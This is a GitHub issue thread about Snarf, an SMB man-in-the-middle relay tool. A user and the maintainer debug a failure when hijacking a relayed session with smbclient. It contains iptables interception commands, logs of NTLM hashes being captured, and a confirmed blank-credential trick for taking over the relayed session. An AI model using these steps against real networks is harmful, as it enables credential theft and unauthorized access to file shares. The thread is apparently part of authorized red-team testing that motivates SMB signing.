### ISSUE TITLE
NTLMSSP packet check failed due to short signature (0 bytes)

### ISSUE THREAD

**Issue by Arno0x** [purpleteam/snarf#7]
Hi,

First of all, congratulations for this great tool that goes like a breeze under KALI.

I'm facing an issue using smbclient while re-using an existing midller session.

Starting snarf goes OK:
```
root@kali:~/Snarf# nodejs snarf.js 192.168.52.130 -d 10.219.46.142
05:31:23 SNARF - 0.3.1 - SMB Man in the Middle Attack Engine
05:31:23 by Josh Stone (yakovdk@gmail.com) and Victor Mata (victor@offense-in-depth.com)
05:31:23 Router: iptables -t nat -X SNARF
05:31:23 Created control server, direct browser to http://localhost:4001/
05:31:23 Interception server bound to 192.168.52.130:445
05:31:23 Router: iptables -t nat -N SNARF
05:31:23 Router: iptables -t nat -A SNARF -p tcp -j LOG
05:31:23 Router: iptables -t nat -A SNARF -p tcp --dport 445 -j DNAT --to 192.168.52.130:445
05:31:23 Router: To intercept, run 'iptables -t nat -A PREROUTING -p tcp --dport 445 -j SNARF'
```
I can then see an incoming client connection:
```
05:31:54 Client 192.168.52.1:58209 connected
05:31:54 Got inbound connection, routing to 10.219.46.142
05:31:54 Destination is 10.219.46.142
05:31:54 Broker currently has 0 similar connections
05:31:54 DB hit -- found connection from iptables
05:38:09 Server connected, will relay to 10.219.46.142
05:38:09 Scrubbing SMB2 dialect
05:38:09 Scrubbing SMB2 dialect
05:38:09 [0] Client: SMB (155 bytes), CMD: SMB_COM_NEGOTIATE
05:38:09 [0] Server: SMB (205 bytes), CMD: SMB_COM_NEGOTIATE
05:38:09 [0] Client: SMB (138 bytes), CMD: SMB_COM_SESSION_SETUP_ANDX
05:38:09 Detected username: unknown
05:38:09 Hash: unknown
05:38:09 [0] Server: SMB (518 bytes), CMD: SMB_COM_SESSION_SETUP_ANDX
05:38:09 Setting UID to 2051
05:38:09 Running CredHunter(packet.buffer)
05:38:09 Setting Challenge to 53282307c067b939
05:38:09 [0] Client: SMB (306 bytes), CMD: SMB_COM_SESSION_SETUP_ANDX
05:38:09 Detected username: TESTUSER
05:38:09 Hash: <redacted>:<redacted>
05:38:09 Writing hash for TEST-DOM\TESTUSER to snarf.pot
05:38:09 [0] Server: SMB (248 bytes), CMD: SMB_COM_SESSION_SETUP_ANDX
05:38:09 Setting UID to 2051
05:38:09 [0] Client: SMB (94 bytes), CMD: SMB_COM_TREE_CONNECT_ANDX
05:38:09 [0] Server: SMB (56 bytes), CMD: SMB_COM_TREE_CONNECT_ANDX
05:38:09 [0] Client: SMB (90 bytes), CMD: SMB_COM_TREE_CONNECT_ANDX
05:38:09 [0] Server: SMB (62 bytes), CMD: SMB_COM_TREE_CONNECT_ANDX
05:38:10 [0] Client: SMB (76 bytes), CMD: SMB_COM_TRANSACTION2
05:38:10 [0] Server: SMB (100 bytes), CMD: SMB_COM_TRANSACTION2
05:38:10 [0] Client: SMB (76 bytes), CMD: SMB_COM_TRANSACTION2
05:38:10 [0] Server: SMB (84 bytes), CMD: SMB_COM_TRANSACTION2
05:38:21 [0] Client: SMB (35 bytes), CMD: SMB_COM_TREE_DISCONNECT
05:38:21 [0] Server: SMB (35 bytes), CMD: SMB_COM_TREE_DISCONNECT
```
This connection is properly relayed to the destination server and is fully functional from the end user perspective. Snarf shows me it's an NTLM1 session.
I "expire" it, and then I "choose" it, which starts the local listener on 127.0.0.1:445.

Then I try to use smbclient to take over this session but I get this error:
```
root@kali:~# smbclient -U b%b //127.0.0.1/c$
NTLMSSP packet check failed due to short signature (0 bytes)!
NTLMSSP NTLM2 packet check failed due to invalid signature!
session setup failed: NT_STATUS_ACCESS_DENIED
```
On the snarf side, here's the log:
```
05:40:11 Changing middler to #0
05:40:18 Authenticating hacker tool
05:40:18 Hacker: SMB (190 bytes), CMD: SMB_COM_NEGOTIATE
05:40:18 Hacker: SMB (156 bytes), CMD: SMB_COM_SESSION_SETUP_ANDX
05:40:18 Hacker: SMB (624 bytes), CMD: SMB_COM_SESSION_SETUP_ANDX
05:40:18 Sending useid = 2051
05:40:18 Keepalive for middler
```

Any idea on how to circumvent/fix this error ?

Thank you,
Arno

**Comment by jephthai** [comment]
I don't recognize the short signature error. You wouldn't have a packet
dump by any chance, would you?

Also, what version of samba do you have installed?

-Josh Stone-

**Comment by Arno0x** [comment]
I tried to get a dump of network packets between the KALI box and the remote target (Windows Server 2008 R2), but it turns out no packet leaves the KALI box. The problem is local, between the smbclient and the Snarf local server. So I took a network dump of the traffic on the loopback interface. Not sure I want to paste it here as it contains NetNTLM hashes of my user (may I send it to you on a PM or e-mail ?), unless it is just a specific info you're looking after ?

To be noted though: the Impacket smbclient.py works fine, but I really need the standard samba smbclient to work as it's the only one able to properly connect to a remote SAMBA server (Unix, not Windows).

Comparing the "working" (Impacket smbclient.py) and "not working" (smbclient) network dumps, I can see a difference though:

- The user authenticating is not the same although I use "b%b" in call cases (probably doesn't matter since it's not actually used against the target system)

- The "Tree ID" attribute is properly set to "//127.0.0.1/c$" in the working connection whereas it's empty (well just an ID, but no path, looking at the pcap packet) in the non-working one

As per your other question, the version of smbclient is:
```
root@kali:~# smbclient -V
Version 4.4.3-Debian
```

**Comment by jephthai** [comment]
Oh, so do you think it's just an issue with smbclient authenticating to the
middler, and it has nothing to do with the target server?

I'm not surprised that there might be an issue there. Our local auth code
is... rudimentary.

When I get back to my home environment, I'll do some experimentation and
see if I can figure something out. Success will probably depend on
reproducing the error, but I have hope.

-Josh Stone-

**Comment by Arno0x** [comment]
I can hand you over the pcap file if that helps... let me know.

**Comment by jephthai** [comment]
That won't be necessary -- I see what the issue is.  In previous versions
of Samba, it would ignore the NTLMSSP signature (a 16-byte chunk on the end
of the NTLM response after both challenges have been exchanged).  So we are
currently just using a canned NTLMSSP negotiation that actually doesn't
even include the signature.  If I swap in a more valid packet that has a
signature, Samba still wants to check the validity of it.

So I guess this is where we decide that we will have to calculate a valid
signature, since I doubt Samba will change this or add a flag to disable
the check.  I guess there might also be other SMB clients that might prefer
to have a valid NTLM response, anyway.

I'm looking through the code in Samba that does this calculation, and maybe
it isn't actually that bad.  I'll get back to you when I have more info,
but I wanted to make sure to keep this thread updated.

Thanks!

**Comment by jephthai** [comment]
Hah!  I learned some interesting things.  The first thing I tried was to implement anonymous authentication.  It's shorter, and has no NTLMSSP blobs, etc.  Just have to login with something like this:

    $ smbclient -U ""%"" //127.0.0.1/c$

And this worked great with Samba 4.1.x, which is what I have on my test box currently.  But when I tested that with Samba 4.4.x, it failed.  I looked in Wireshark, and noticed that even when you specify a blank username and password, the new Sambas will still try NTLMSSP auth.  I sniffed a "blank" authentication to Win7, and noticed that Windows processes the NTLMSSP login as an anonymous authentication, and actually responds without an NTLMSSP signature (since there's no password!).

So, on a lark, I tried the current code, as found in github, only with the blank username and password syntax.  This is the (seemingly working?) result:

    0625 19:27 :) josh ntlmssp $ /usr/local/samba/bin/smbclient -V
    Version 4.4.3
    0625 19:27 :) josh ntlmssp $ /usr/local/samba/bin/smbclient -U ""%"" //127.0.0.1/c$
    Domain=[SNARFING_MITM] OS=[Snarf] Server=[Josh S. & Victor M.]
    smb: \> ls
      $Recycle.Bin                      DHS        0  Sat Jan 16 16:55:24 2016
      66233e5b179ba61bf8a8f28a0023a6      D        0  Mon Mar  2 06:19:08 2015
      AuricSystems                        D        0  Mon Jul 27 09:52:29 2015
      autocli.exe                         A   117598  Wed Feb 18 11:13:55 2015
      autopilot.exe                       A   118302  Fri Jan 23 17:22:53 2015
      autopilot.log                       A     5111  Mon Aug 25 18:15:56 2014
      . . .

So, what I'm wondering is if I could get you to test that as well.  Does a blank username and password work for you with your new Samba?  If so, then we should be good for now.  Sometime in the future, I certainly want a legitimate NTLMSSP authenticator anyway, so it'll be on the eventual roadmap.  But I'm wondering if this might work for you?

Let me know!

**Comment by Arno0x** [comment]
Wow, that was quite an interesting piece of work. Thanks for keeping this up !

I'll try this first time tomorrow morning when I get back to work where my test environment lies, I'll keep you posted.

Cheers !

**Comment by Arno0x** [comment]
Hi,

Tested this morning smbclient (v4.4.3) with blank username/password and **it works** !

Thank you so much for helping me getting around this issue. Eventually, I can now use Snarf + smbclient to mount a share on a Samba Unix server which is a perfect step in demonstrating the need of implementing "SMB signing", still some work ongoing on setting myself in a proper MiTM situation (LLMNR poisonning + http --> SMB ntlm relay should do the trick).

Thanks.
